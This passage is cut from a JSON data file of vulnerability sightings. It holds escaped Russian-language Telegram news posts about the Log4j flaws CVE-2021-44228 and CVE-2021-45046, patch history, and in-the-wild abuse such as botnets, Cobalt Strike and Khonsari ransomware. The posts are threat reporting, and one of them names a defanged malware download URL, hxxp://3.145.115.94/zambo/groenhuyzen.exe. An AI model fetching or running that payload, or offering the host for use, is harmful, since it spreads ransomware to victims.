\u043c\u043e\u043c\u0435\u043d\u0442\u0435 \u0441\u0438\u0441\u0442\u0435\u043c, \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u043e\u0442 \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0434\u043e \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0445 \u043d\u0430\u0433\u0440\u0443\u0437\u043e\u043a \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445.\n \n\u0410 \u0442\u0435\u043f\u0435\u0440\u044c Cloudflare \u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442, \u0447\u0442\u043e \u0431\u0443\u043a\u0432\u0430\u043b\u044c\u043d\u043e \u0432\u0447\u0435\u0440\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u0435\u0440\u0435\u043e\u0440\u0438\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u043d\u0430 \u0432\u0442\u043e\u0440\u0443\u044e CVE, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u0443\u044e \u0432 \u0448\u0438\u0440\u043e\u043a\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u0439 \u0443\u0442\u0438\u043b\u0438\u0442\u0435 \u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0436\u0443\u0440\u043d\u0430\u043b\u043e\u0432 Log4j.\n \n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2021-45046  \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 Log4j \u043e\u0442 2.0-beta9 \u0434\u043e 2.12.1 \u0438 \u043e\u0442 2.13.0 \u0434\u043e 2.15.0 \u0438 \u0432\u043e\u0437\u043d\u0438\u043a\u043b\u0430 \u043d\u0435\u043f\u043e\u043b\u043d\u043e\u0433\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Apache Software Foundation \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0435\u0439 CVE \u0432 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043d\u0435\u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0445 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f\u0445, \u043e\u0442\u043b\u0438\u0447\u043d\u044b\u0445 \u043e\u0442 \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043a \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e. \u041d\u0435\u043f\u043e\u043b\u043d\u044b\u0439 \u043f\u0430\u0442\u0447 \u0434\u043b\u044f CVE-2021-44228 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0432\u0445\u043e\u0434\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0448\u0430\u0431\u043b\u043e\u043d\u0430 \u043f\u043e\u0438\u0441\u043a\u0430 JNDI, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0430\u0442\u0430\u043a\u0435 \u0442\u0438\u043f\u0430 \u043e\u0442\u043a\u0430\u0437 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438 (DoS). \u0412 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u0435\u0435 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e \u043f\u043e\u0444\u0438\u043a\u0441\u0438\u043b\u0438 \u0432 Log4j \u0432\u0435\u0440\u0441\u0438\u0438 2.16.0.\n \n\u0415\u0449\u0435 \u0431\u043e\u043b\u044c\u0448\u0443\u044e \u0442\u0440\u0435\u0432\u043e\u0433\u0443 \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 Praetorian, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u044e\u0442 \u043e \u0442\u0440\u0435\u0442\u044c\u0435\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Log4j \u0432\u0435\u0440\u0441\u0438\u0438 2.15.0, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0434\u0430\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043a\u0440\u0430\u0436\u0438 \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u043f\u0440\u0438 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u0443\u0441\u043b\u043e\u0432\u0438\u044f\u0445. \u0422\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0435 \u0440\u0430\u0437\u0433\u043b\u0430\u0448\u0430\u044e\u0442\u0441\u044f, \u0434\u0430\u0431\u044b \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0442\u0438\u0442\u044c \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0438\u0439 \u043a\u043e\u043b\u043b\u0430\u043f\u0441, \u0438, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0435\u0449\u0435 \u0438 \u043f\u043e\u0442\u043e\u043c\u0443, \u0447\u0442\u043e \u043d\u043e\u0432\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044f 2.16.0, \u043f\u043e \u0432\u0441\u0435\u0439 \u0432\u0438\u0434\u0438\u043c\u043e\u0441\u0442\u0438, \u043d\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0435\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0439.\n \n\u041c\u043e\u0436\u0435\u0442\u0435 \u0441\u0430\u043c\u0438 \u043e\u0446\u0435\u043d\u0438\u0442\u044c, \u043a\u0430\u043a \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u044f \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0432 Log4j 2.15.0.", "creation_timestamp": "2021-12-16T12:58:15.000000Z"}, {"uuid": "6328a898-daf7-45cd-92d0-9e1540fa0eea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/true_secator/2434", "content": "\u200b\u200b\u0421\u0443\u0434\u043d\u0430\u044f \u043d\u043e\u0447\u044c \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442\u0441\u044f.\n \n0-day \u0443\u044f\u0432\u0438\u043c\u043e\u0441\u0442\u044c Log4Shell \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043e\u0446\u0435\u043d\u043a\u0443 10/10 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSSv3, \u043d\u043e \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435, \u043a\u0430\u043a \u043c\u044b \u0438 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u0438, \u043e\u043a\u0430\u0437\u0430\u043b\u0430\u0441\u044c \u043a\u0443\u0434\u0430 \u0431\u043e\u043b\u0435\u0435 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439, \u0447\u0435\u043c \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u043e\u0441\u044c \u0438\u0437\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e, \u0432\u0435\u0434\u044c \u043d\u0430 \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f, \u043a\u0430\u043a \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u0438 LunaSec, \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0445 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043d\u0430\u0432\u044b\u043a\u043e\u0432 \u0438 \u0443\u043a\u043b\u0430\u0434\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0432 \u043e\u0434\u043d\u0443 \u0441\u0442\u0440\u043e\u0447\u043a\u0443 \u043a\u043e\u0434\u0430.\n \n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, CVE-2021-44228 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043f\u043e\u0447\u0442\u0438 \u0432\u0441\u0435 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u044b Apache Software Foundation \u0438 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0444\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u043e \u0432\u0441\u0435\u0445 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u0445 \u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 Java. Apple, Amazon, Twitter, Cloudflare, Steam, Tencent, Baidu, DIDI, JD, NetEase \u0438 \u0442\u044b\u0441\u044f\u0447\u0438 \u0434\u0440\u0443\u0433\u0438\u0445 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u0434\u043b\u044f \u0430\u0442\u0430\u043a Log4Shell.\n \n\u0412\u0441\u0435 \u043d\u0430\u0441\u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043b\u043e\u0445\u043e, \u0447\u0442\u043e \u0434\u0430\u0436\u0435 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0435 Apache Software Foundation \u044d\u043a\u0441\u0442\u0440\u0435\u043d\u043d\u043e\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043d\u0438\u043a\u0430\u043a \u043d\u0435 \u043f\u043e\u0432\u043b\u0438\u044f\u043b\u043e \u043d\u0430 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044e. \u041a \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u043c\u0443 \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0443\u0436\u0435 \u043c\u0430\u0441\u0441\u043e\u0432\u043e \u0441\u043a\u0430\u043d\u044f\u0442 \u0441\u0435\u0442\u044c \u0432 \u043d\u0430\u0434\u0435\u0436\u0434\u0435 \u043d\u0430 LogJam.\n \n\u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435, \u043d\u0430 \u043f\u043e\u043c\u043e\u0449\u044c \u043f\u0440\u0438\u0448\u043b\u0438 \u0447\u0430\u0441\u0442\u043d\u044b\u0435 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b: Cybereason \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043b\u0438 \u0432\u0430\u043a\u0446\u0438\u043d\u0443 Logout4Shell \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f Log4Shell. \u0421\u0446\u0435\u043d\u0430\u0440\u0438\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u043f\u0440\u043e\u0438\u0437\u0432\u0435\u0441\u0442\u0438 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0443 \u0441\u0435\u0440\u0432\u0435\u0440\u0430 LDAP \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 Java, \u043f\u043e \u0441\u0443\u0442\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u0438 \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u044f \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0443, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043e\u0442\u043a\u043b\u044e\u0447\u0430\u0435\u0442 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 trustURLCodebase \u043d\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435 Log4j. \u0412\u0441\u0435 \u0431\u044b \u043d\u0438\u0447\u0435\u0433\u043e, \u0435\u0441\u043b\u0438 Logout4Shell \u0441\u0430\u043c \u043f\u043e \u0441\u0435\u0431\u0435 \u043d\u0435 \u0431\u044b\u043b \u0431\u044b \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d \u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u043b\u0435\u043d\u0438\u044f\u043c, \u043d\u043e, \u0432 \u0431\u043e\u044e \u0432\u0441\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0445\u043e\u0440\u043e\u0448\u0438, \u043f\u043e \u043c\u043d\u0435\u043d\u0438\u044e \u0435\u0433\u043e \u0430\u0432\u0442\u043e\u0440\u043e\u0432.\n \n\u0410 \u0442\u0435\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0435\u043c, \u0432 \u043f\u043e\u043b\u044f\u0445 \u0445\u0430\u043a\u0435\u0440\u044b \u0432\u0441\u0435\u0445 \u043c\u0430\u0441\u0442\u0435\u0439 \u043e\u0442\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u044e\u0442 \u0434\u044b\u0440\u0443 \u0432\u0434\u043e\u043b\u044c \u0438 \u043f\u043e\u043f\u0435\u0440\u0451\u043a.\n \n\u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c Netlab 360, \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u0433\u0440\u0443\u0437\u044f\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e Mirai, Muhstik \u0438 Kinsing, \u043b\u044f \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u043a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0435\u0440\u043e\u0432 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u0440\u0443\u043f\u043d\u043e\u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u044b\u0445 DDoS-\u0430\u0442\u0430\u043a. Microsoft 365 Defender Threat Intelligence \u0444\u0438\u043a\u0441\u0438\u0440\u0443\u044e\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Log4j \u0434\u043b\u044f \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f \u0438\u043c\u043f\u043b\u0430\u043d\u0442\u0430\u0442\u0430 Cobalt Strike. \u041d\u0435 \u043c\u0435\u043d\u0435\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u044b \u0438 \u0442\u0435, \u043a\u0442\u043e \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0435\u0442 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 Log4Shell \u0434\u043b\u044f \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u0441 \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0438\u043c\u044f \u0445\u043e\u0441\u0442\u0430, \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0432 \u0441\u043b\u0443\u0436\u0431\u0435 Log4j, \u043d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u0438 \u043d\u043e\u043c\u0435\u0440 \u0432\u0435\u0440\u0441\u0438\u0438 \u041e\u0421 \u0438 \u0434\u0440.\n \n\u041d\u043e, \u043f\u043e\u0436\u0430\u043b\u0443\u0439, \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0435 \u0441\u043b\u0438\u0432\u043a\u0438 \u0441\u043d\u0438\u043c\u0430\u043b\u0438\u0441\u044c \u0433\u043e\u0440\u0430\u0437\u0434\u043e \u0440\u0430\u043d\u0435\u0435, \u0447\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u044b\u043b\u0430 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0430 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e 10 \u0434\u0435\u043a\u0430\u0431\u0440\u044f. \u0412\u043f\u0435\u0440\u0432\u044b\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c \u0443\u044f\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c Cloudflare \u0435\u0449\u0435 1 \u0434\u0435\u043a\u0430\u0431\u0440\u044f, \u0430 \u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0434\u0435\u043d\u044c \u043e\u0431 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u0442\u0430\u043a\u0436\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0432 \u043e\u0442\u0447\u0435\u0442\u0435 Cisco Talos, \u0447\u0442\u043e \u0431\u044b\u043b\u043e \u0434\u043e \u0434\u0435\u043a\u0430\u0431\u0440\u044f - \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c\u0441\u044f \u043f\u043e\u0437\u0436\u0435, \u0440\u0430\u0432\u043d\u043e \u0438 \u0442\u043e, \u043d\u0430\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0432\u0441\u0435 \u043f\u0435\u0447\u0430\u043b\u044c\u043d\u043e \u0441\u0435\u0439\u0447\u0430\u0441.\n \n\u041d\u0443, \u0430 \u043f\u043e\u043a\u0430, \u0434\u043e\u0440\u043e\u0433\u0438\u0435 \u043d\u0430\u0448\u0438, Merry Christmas!!!", "creation_timestamp": "2021-12-13T14:04:08.000000Z"}, {"uuid": "1c7b3ac1-8133-492f-9658-b725e2565516", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/true_secator/2446", "content": "\u041f\u043e\u0434\u0442\u044f\u043d\u0443\u043b\u0430\u0441\u044c \u0442\u044f\u0436\u0435\u043b\u0430\u044f \u0430\u0440\u0442\u0438\u043b\u043b\u0435\u0440\u0438\u044f: \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0438\u0439 Jam, \u043a\u0430\u043a \u043c\u044b \u0438 \u043f\u0440\u043e\u0433\u043d\u043e\u0437\u0438\u0440\u043e\u0432\u0430\u043b\u0438, \u0435\u0449\u0435 \u0432\u043f\u0435\u0440\u0435\u0434\u0438.\n \n\u0412\u0441\u0435 \u044d\u0442\u043e \u0434\u0430\u0436\u0435 \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a CVE-2021-44228 \u0431\u044b\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0435\u0449\u0435 6 \u0434\u0435\u043a\u0430\u0431\u0440\u044f \u0441 \u0432\u044b\u043f\u0443\u0441\u043a\u043e\u043c Log4j 2.15.0, \u0430 \u0432\u044b\u0437\u0432\u0430\u043d\u043d\u0430\u044f \u044d\u0442\u0438\u043c \u043f\u0430\u0442\u0447\u0435\u043c \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0430\u044f CVE-2021-45046 (\u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0432\u0448\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c log4shell  \u0432 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043d\u0435\u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u043d\u044b\u0445 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f\u0445 \u0441 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c\u044e \u0430\u0442\u0430\u043a \u0441 \u043e\u0442\u043a\u0430\u0437\u043e\u043c \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438) \u0442\u0430\u043a\u0436\u0435 \u0431\u044b\u043b\u0430 \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0432\u044b\u043f\u0443\u0441\u043a\u043e\u043c \u0441\u0430\u043c\u043e\u0439 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 Log4j 2.12.2 \u0438 2.16.0, \u0443\u0434\u0430\u043b\u044f\u044e\u0449\u0435\u0439 \u0444\u0443\u043d\u043a\u0446\u0438\u044e \u043f\u043e\u0438\u0441\u043a\u0430 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439 \u0438 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u0431\u043b\u043e\u043a\u0438\u0440\u0443\u044e\u0449\u0435\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a JNDI.\n \n\u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435, \u0431\u043e\u043b\u0435\u0435 70 \u043e\u0431\u0440\u0430\u0437\u0446\u043e\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0445 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043e, \u0447\u0442\u043e \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u043f\u043e \u0441\u0440\u0430\u0432\u043d\u0435\u043d\u0438\u044e \u0441 \u0442\u0435\u043c, \u0447\u0442\u043e, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0443\u0436\u0435 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435.\n \n\u041d\u043e \u0447\u0442\u043e \u0435\u0449\u0435 \u0445\u0443\u0436\u0435, Bitdefender \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438, \u0447\u0442\u043e \u0437\u0430 Log4Shell \u0432\u0437\u044f\u043b\u0438\u0441\u044c \u043f\u0435\u0440\u0432\u044b\u0435 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0438. \u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043f\u044b\u0442\u0430\u044e\u0442\u0441\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043e\u0448\u0438\u0431\u043a\u0443 \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0434\u0432\u043e\u0438\u0447\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 .NET \u0441 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0448\u0438\u0444\u0440\u0443\u0435\u0442 \u0444\u0430\u0439\u043b\u044b \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 c \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u0435\u043c khonsari. \u0417\u0430\u043f\u0438\u0441\u043a\u0430 \u0441 \u0442\u0440\u0435\u0431\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0432\u044b\u043a\u0443\u043f\u0430 \u00ab\u041a\u0410\u041a \u041f\u041e\u041b\u0423\u0427\u0418\u0422\u042c \u0421\u0412\u041e\u0418 \u0424\u0410\u0419\u041b\u042b BACK.TXT\u00bb \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043d\u0430 \u0440\u0430\u0431\u043e\u0447\u0438\u0439 \u0441\u0442\u043e\u043b.\n \n\u041f\u0435\u0440\u0432\u044b\u0439 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442 \u0431\u044b\u043b \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d 11 \u0434\u0435\u043a\u0430\u0431\u0440\u044f, \u043a\u043e\u0433\u0434\u0430 \u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0439 \u0445\u043e\u0441\u0442 \u0431\u044b\u043b \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0434\u0432\u043e\u0438\u0447\u043d\u044b\u0439 \u0444\u0430\u0439\u043b \u0441 hxxp://3.145.115.94/zambo/groenhuyzen.exe. \u042d\u0442\u043e \u043d\u043e\u0432\u043e\u0435 \u0441\u0435\u043c\u0435\u0439\u0441\u0442\u0432\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439, \u043f\u043e\u043b\u0443\u0447\u0438\u0432\u0448\u0438\u0445 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u0431\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f 